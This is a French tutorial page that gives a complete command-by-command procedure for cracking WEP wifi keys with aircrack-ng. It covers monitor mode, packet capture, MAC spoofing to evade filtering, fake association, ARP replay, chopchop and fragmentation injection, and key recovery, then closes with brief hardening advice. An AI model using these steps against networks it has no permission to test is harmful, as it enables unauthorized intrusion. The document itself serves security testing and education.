You speak english?


Vous avez aimé cet article ? Soutenez nous en téléchargeant nos applications Android.







alt
Comment cracker un réseau wifi.
Tests de vulnérabilités puis conseils pour la sécurisation de son réseau sans fil.

 

Plateforme : Linux, wifi
Détails : La vulnérabilité du wifi et sécurisé correctement son réseau sans fil

 

J'ai décidé d'écrire ce wiki en vue de montrer qu'il est facilement possible de cracker un réseau wifi.
C'est pourquoi il est destiné uniquement à tester la sécurité de son propre réseau et non celui de son voisin.
Je ne serai en aucun cas responsable de la mauvaise utilisation de ce wiki.
Pour rappel l'intrusion est punie par la loi et vous risquez de fortes peines de prison et amendes.

Voici ci dessous le wiki permettant de cracker un réseau wifi et aussi comprendre comment bien sécuriser votre réseau wifi afin d'éviter d'éventuelles intrusions.


Le principe :

Voici l'explication de la manipulation que nous allons effectuer pour cracker un réseau wifi.
Tout d'abord voici une mise en situation avec la représentation d'un réseau wifi :

alt

Chaque ordinateur échange des données avec le point d'accès wifi,
ces données sont cryptées via une clé.

Plusieurs types de cryptage par clé existent,
les deux plus répandus sont le cryptage par clé WEP et le cryptage par clé WPA.

Dans ce tutoriel nous allons cracker une clé WEP, les cryptages WPA sont très difficiles à cracker
car vous devez utiliser un crack par liste de mots (dictionnaires), et cela peut être très très long car le
programme doit tester chaque mots contenu dans cette liste manuellement.
Sous entendu aussi que la clé WPA doit être un mot et non une suite illogique de lettres et de chiffres.

Passons plutôt au cryptage WEP,
qui est lui plus facile étant donné une faille présente dans les packets ARP
(données de type ARP qui transitent entre le point d'accès wifi et un pc).

Voici l'exemple d'une clé WEP que l'on aura à trouver pour pouvoir se connecter sur le point d'accès :
Elle sera du type : FF:0E:0F:92:28:16:57:5B:F5:55:76:3A:DE

Note : pour se connecter via windows on entrera la clé de cette manière :
FF0E0F922816575BF555763ADE

Pour trouver cette clé nous allons devoir aller à la pêche aux données du type ARP,
nous utiliserons un donc un sniffer qui s'appelle airodump pour capturer ces données
qui transitent sur le réseau wifi.

Mais pour capturer assez de données ARP, il faut que le point d'accès wifi soit quelque peut stimuler.
Nous allons donc le faire "parler" en lui injectant des données via le wifi grace à aireplay.

Cette injection de packet ARP va générer des IVS, très important car c'est le nombre d'IVS capturé qui va nous permettre de cracker la clé WEP, compter environ 40 000 IVS pour un clé WEP.
En utilisation normale vous pouvez obtenir jusqu'a 300 IVS par seconde.
Soit environ 3 minutes pour obtenir assez d'IVS pour cracker la clé WEP.

Une fois que l'on aura assez de données capturer,
on pourra alors exploité la faille de ce protocole de communication.
A l'aide de l'outil aircrack nous allons lancer une analyse des données qui permettra d'obtenir la clé.


Outils et connaissances nécessaires :

Pour le crackage d'un réseau wifi nous aurons besoin de différents outils ainsi que un peu de connaissances sur les systèmes Linux. Vous pouvez aussi trouver des wikis sur le crackage sous Windows mais je le déconseille fortement car ce n'est pas aussi efficace que sous Linux.

L'intégralité du wiki ce déroulera en ligne de commande, et demande une certaine rigueur et patience
et quelques connaissances Linux et sur le Wifi.
Il faudra aussi disposer d'une carte wifi compatible en mode MONITORING
et d'un espace de stockage type clé usb ou autre.

Pour commencer utilisez la distribution Linux spécialement prévu pour les tests de sécurité réseau.
Il s'agit de la distribution Backtrack disponible ici : http://backtrack-fr.net/
Enregistrer le fichier ISO sur votre PC puis graver le sur un CD.

Si vous souhaitez vous pouvez très bien installer les outils sur votre propre distribution Linux.



Utilisation du LIVE CD BackTrack :

Après avoir graver l'image de la distribution BackTrack via un logiciel de gravure,
nous somme prêts pour débuter le wiki.

- Placer le CD dans votre lecteur, puis redémarrer.
- Au démarrage de votre ordinateur, celui doit Booter sur le CD.
- Un choix vous est alors proposé.
- Sélectionner l'interface KDE et démarrer BackTrack.
- Après chargement vous arrivez sur un interface graphique type KDE.

Nous voici prêt pour débuter le crackage de votre réseau wifi.



Récupération des informations de votre carte wifi :

Nous allons maintenant récupérer les informations qui seront nécessaires par la suite.
Voici les informations que l'ont doit trouver :
- L'interface de votre carte wifi (de type eth1, wlan0, etc..)
- L'adresse MAC de votre carte wifi (de type par exemple 01:02:03:04:05:06)

Pour cela vous devez ouvrir un ligne de commande en cliquant sur l'icône à coté du menu KDE.

alt

Saisissez alors la ligne suivante :

ifconfig
Voici le résultat de cette commande et les informations que vous devez noter.

alt

Vous devez noter l'adresse mac de votre carte wifi ici : 00:0C:22:22:E2:69
Ainsi que l'interface de votre carte wifi ici l'interface ce nomme "eth0".

Note : Il se peut que celle ci ce nomme aussi "eth1" ou "wlan0" ou encore "wifi0".



Activation du mode Monitoring de votre carte wifi :

Vous devez avant toute chose, basculer votre carte wifi dans son mode Monitoring,
ce qui va permettre à votre carte wifi de capter des données sur le réseau wifi et surtout d'injecter sur le réseau.
Pour basculer dans ce mode nous allons utiliser un outil qui s'appelle : airmon-ng

Toujours dans la fenêtre de commande, voici comment utiliser aimon-ng

Activer le mode monitoring : airmon-ng start inferface
Désactiver le mode monitoring : airmon-ng stop interface

Dans notre exemple on utilisera :

airmon-ng start eth0
Si la carte a basculé en mode monitoring vous devriez avoir la phrase "monitor mode enabled",
comme ci dessous :

alt




Récupération des informations sur les réseaux wifi au alentour :

Maintenant vous êtes prêt pour commencer l'analyse des réseaux wifi.
Pour cela vous devez utiliser l'outil : airodump-ng
Cet outil va nous permettre de scanner les réseaux wifi disponible
et par la suite de capturer les données (packets) qui transitent par le wifi.

Voici comment obtenir la liste des réseaux wifi que votre carte wifi capte :

Scan avec airodump-ng : airodump-ng interface

Dans notre exemple nous utiliserons :
airodump-ng eth0
Voici le résultat de cette commande :

alt

On retrouve des informations importantes sur ce listing.
Voici les éléments qu'il faudra noter pour une utilisation futur.

Sur la première ligne en rouge (la liste des points d'accès wifi) :

- Le nom du point d'accès : test
- L'adresse MAC du point d'accès : 13:28:11:75:E7:08
- Le numéro de channel (ch) : 1

- L'adresse MAC du PC qui est associé au point d'accès visé : 00:C0:CA:11:CC:D5

Note : la partie #/s sera importante par la suite pour vérifier si l'injection fonctionne et ainsi optenir des IVS néccessaires au programme aircrack qui utilise ces données pour trouver le bonne clé de sécurité.

La deuxième en rouge est optionnelle,
mais la liste des connexions entre PC et point d'accès wifi permet de contourner un éventuel filtrage MAC en ce falsifiant sa propre adresse MAC via la commande :
macchanger --mac NOUVELLE_ADR_MAC INTERFACE
soit dans l'exemple:

macchanger --mac 00:C0:CA:11:CC:D5 eth0

Capture des données qui transitent en wifi :

Une fois que vous avez noté les différentes informations sur le point d'accès que vous ciblez,
Ouvrez une nouvelle fenêtre / onglet de la console (ligne de commande).

Pour l'étape suivante vous aurez besoin d'un espace disque
(soit une clé usb, un disque dur externe, ou encore une partition)

Placez vous dans votre espace de stockage via la commande linux "cd votre/chemin/"

Notes : "ls" pour lister un répertoire, "cd" pour ce placer dans le répertoire.
Votre commande devrait être du style cd /mnt/sda1/ (Pour une clé usb).
Vous devez laisser le programme ouvert durant le reste de la manipulation, car c'est lui qui
enregistrera les données du réseau.

Une fois placé sur votre clé USB vous pouvez commencer la capture des données (sniffing)
via cette commande : airodump-ng --write nomdufichierdesortie --channel NumeroChannel Interface

Ce qui donnera dans notre exemple :
airodump-ng -write capture -c 1 eth0

Note : Le "-c 1" est optionnel, mais il permet de capturer uniquement les données qui transitent sur le canal 1

Une fois la commande exécutée vous devriez voir la même capture vue plus haut,
sauf que cette fois les données sont enregistrées dans un fichier.

Vous allez donc pouvoir débuter la fausse association auprès du point d'accès wifi.

Important :
Vous devez laisser le programme fonctionner pendant toute la durée du crackage du réseau wifi.


Comment effectuer une fausse association avec le point d'accès wifi ?

Cette étape n'est pas obligatoire, mais permet de vérifier si le point d'accès possède un filtrage mac ou pas.
Cependant j'ai remarqué que la capture des données "utiles", fonctionne mieux si la fausse association est réalisée.
Pour effectuer notre fausse association auprès du point d'accès nous allons utiliser "aireplay-ng".
Ouvrez une autre invite de commande puis utilisez airepay comme ci dessous :
Commande : aireplay-ng -1 0 -e NOM_AP -a MAC_AP -h MAC_PC -x PACKETS/S
INTERFACE

NOM_AP : Le nom du point d'accès
MAC_AP : L'adresse mac du point d'accès
MAC_PC : L'adresse mac de votre carte wifi
INTERFACE : Interface de votre carte wifi (eth0 ... )
PACKETS/S : Détermine la vitesse de transmission des packets, il est important de déterminer ce chiffre, car il permet de réduire les plantages du programme dûs à l'injection trop rapide des données sur le réseau wifi.
Plus le point d'accès sera éloigné, plus il faudra réduire ce nombre, valeurs optimal entre 50 et 200

Ce qui donnera dans notre exemple :

aireplay-ng -1 0 -e test -a 13:28:11:75:E7:08 -h 00:0C:22:22:E2:69 -x 100 eth0

Voici la capture d'une fausse association réussie :

alt


Injection de données sur le réseau wifi :

Pour commencer cette partie, vous devez vérifier certains points :
- Airodump-ng capture bien les données sur votre clé usb (par exemple)
- Vous avez toutes les informations nécessaires, ESSID, BESSID du point d'accès.

Pour injecter des packets sur le réseau,
nous allons utiliser le même programme que pour l'association : "aireplay-ng"
L'injection de packet permettra de générer du traffic et donc de stimuler le routeur wifi pour qu'il génère des données utiles au crackage de la clé WEP (IVS).

Il existe 3 méthodes pour injecter des données sur le réseau wifi.

- La méthode ré-injection de packets
(-3) : qui signifie que le programme va attendre de capturer un packet ARP pour ensuite l'injecter sur le réseau.

- La méthode ChopChop (-4) : le programme va générer un faux paquet ARP et va l'envoyer sur le réseau wifi.

- La méthode par fragmentation (-5) : le programme va générer des keystream valides, ce qui va nous permettre de générer un packet ARP par la suite et de l'envoyer.



La méthode ré-injection ARP (aireplay-ng -3) :

Cette méthode est la plus simple à mettre en oeuvre, car elle permet de capturer directement le packet ARP et de le renvoyer sur le réseau wifi. Vous n'avez plus qu'a attendre la génération de IVS.

Très important, le programme airodump-ng doit être en fonctionnement et enregistrer les données.
(Voir plus haut dans la partie capture des données wifi)


Utilisation : aireplay-ng -3
-b MAC_AP -h MAC_PC -x PACKETS/S INTERFACE

MAC_AP : L'adresse mac du point d'accès
MAC_PC : L'adresse mac de votre carte wifi
INTERFACE : Interface de votre carte wifi (eth0 ... )
PACKETS/S : Détermine la vitesse de transmission des packets, il est important de déterminer ce chiffre, car il permet de réduire les plantages du programme dû à l'injection trop rapide des données sur le réseau wifi.
Plus le point d'accès sera éloigné, plus il faudra réduire ce nombre, valeurs optimales entre 50 et 200



Ce qui donnera dans notre exemple :
aireplay-ng -3 -b 13:28:11:75:E7:08 -h 00:0C:22:22:E2:69 -x 100 eth0

Voici une capture d'écran qui montre le programme en cours ré-injection de packet ARP.
Les informations importantes sont en rouge.




La méthode ChopChop (aireplay-ng -4) et Fragmentation (aireplay-ng -5) :

Les méthodes ChopChop et Fragmentation sont très efficaces lorsque le routeur ne communique pas beaucoup de données ou lorsque personne n'est connecté au routeur.

Voici la commande pour la méthode chopchop :
aireplay-ng -4 -b MAC_AP -h MAC_PC -x PACKETS/S INTERFACE

Voici la commande pour la méthode fragmentation :
aireplay-ng -5 -b MAC_AP -h MAC_PC -x PACKETS/S INTERFACE

Ce qui donnera dans notre exemple pour l'attaque Chopchop :
aireplay-ng -4 -b 13:28:11:75:E7:08 -h 00:0C:22:22:E2:69 -x 100 eth0
Et pour l'attaque par fragmentation :
aireplay-ng -5 -b 13:28:11:75:E7:08 -h 00:0C:22:22:E2:69 -x 100 eth0

Lorsque le programme capturera des données, elles seront utilisées pour créer un packet ARP, qui pourra ensuite
être utilisé pour générer des IVS.

Voici une capture d'écran pour l'attaque chopchop :



Note importante : Une fois que le programme a fini (100%) de générer le packet, celui ci enregistre 2 fichiers
un fichier cap et un fichier xor, notez bien les 2 noms et chemin de ces fichiers.

Une fois que le programme a généré un fichier .XOR et .CAP, il faut créer un packet ARP valide à l'aide de packetforge-ng


Générer un packet ARP valide avec packetforge-ng :
(uniquement si vous avez utilisé la méthode chopchop ou fragmentation)


Une fois que l'attaque chopchop ou fragmentation a enregistré les deux fichiers .xor et .cap, nous allons pouvoir
créer un packet ARP valide pour ensuite le renvoyer au routeur pour obtenir des IVS.

Voici la commande :
packetforge-ng -0 -a MAC_AP -h MAC_PC -k 192.168.1.1 -l 255.255.255.255 -y FILE_XOR -w FILE.cap

MAC_AP : L'adresse mac du point d'accès
MAC_PC : L'adresse mac de votre carte wifi
FILE_XOR : Nom du fichier xor précédemment enregistré
FILE.cap : Nom du fichier à enregistrer.

Ainsi dans notre exemple cela donnera :
packetforge-ng -0 -a 13:28:11:75:E7:08 -h 00:0C:22:22:E2:69 -k 192.168.1.1 -l 255.255.255.255 -y replay_dec-0212-224255.xor -w arp.cap

Notes : Le paramètre k permet de définir l'ip distante soit ici dans la plupart des cas l'adresse ip du routeur soit : 192.168.1.1. Dans certain cas, vous pouvez aussi utiliser l'adresse IP 255.255.255.255 pour les deux paramètres -k et -l


Renvoi du packet ARP :
(uniquement si vous avez utilisé la méthode chopchop ou fragmentation)


Lorsque vous avez votre fichier arp.cap créer par packetforge-ng, vous pouvez maintenant le renvoyer au routeur via aireplay-ng. Ainsi ce fichier ARP valide permettra d'obtenir des IVS.

Très important, le programme airodump-ng doit être en fonctionnement et enregistrer les données.
(Voir plus haut dans la partie capture des données wifi)


Voici la commande : aireplay-ng -3 -b MAC_AP -h MAC_PC -r FILE_ARP -x PACKETS/S INTERFACE

MAC_AP : L'adresse mac du point d'accès
MAC_PC : L'adresse mac de votre carte wifi
INTERFACE : Interface de votre carte wifi (eth0 ... )
FILE_ARP : L'adresse mac du point d'accès
PACKETS/S : Détermine la vitesse de transmission des packets, il est important de déterminer ce chiffre, car il permet de réduire les plantages du programme dû à l'injection trop rapide des données sur le réseau wifi.
Plus le point d'accès sera éloigné, plus il faudra réduire ce nombre, valeurs optimales entre 50 et 200

Ainsi dans notre exemple cela donnera :
aireplay-ng -3 -b 13:28:11:75:E7:08 -h 00:0C:22:22:E2:69 -r arp.cap -x 100 eth0
Note : Le fonctionnement reste le même que vu plus haut, normalement le nombre de PPS doit monter (en fonction bien sur de votre vitesse de transmission -x


Crack de la clé WEP avec aircrack-ng :

Une fois que vous avez capturé assez de données avec airodump-ng et que aireplay-ng a généré assez d'IVS,
vous pouvez alors trouver la clé wep via le programme aircrack-ng.

Commande : aircrack-ng FICHIERS.CAP

FICHIER.CAP : noms des fichiers capturé par airodump-ng, utilisé * pour tous les séléctionnés

Dans notre exemple :

aircrack-ng *.cap

Notes : Compter environ 10 à 20 minutes en fonction de la vitesse et de la distance du point d'accès pour que le programme aircrack-ng puisse trouvé la clé.
Pour une clé wep, il faut environ 40 000 IVS
Pour un décryptage plus rapide, vous pouvez utiliser le paramètre -x ( aireplay-ng -x *.cap )

Vous devrez alors sélectionner le réseau puis le programme se charge du reste.

Capture d'écran d'une clé WEP trouvée :




Conclusion :

Comme vous pouvez le voir, la sécurité du wifi n'est pas fiable à 100%, même avec un cryptage WPA.
Pour mieux vous protéger contre des intrusions, voici quelques conseils :

- Utiliser une clé WPA longue qui ne signifie rien (exemple : fdx48erf2sz8xczrg9...)
- Configurer votre routeur pour avoir un filtrage mac.
- Changer quelques fois de clé WPA.


Liens

Voici quelques liens qui pourront vous être utiles, pour compléter cet article :
Site de la distribution Backtrack
Documentation airodump-ng
Documentation aireplay-ng
Documentation aircrack-ng
Documentation packetforge-ng

 

- haut de page -



About me

Développeur indépendant et créateur d'innovations.

Stay in touch

wakdevjulien [arobase] wakdev.com

All rights reserved : wakdev
Tread softly because you tread on my internet...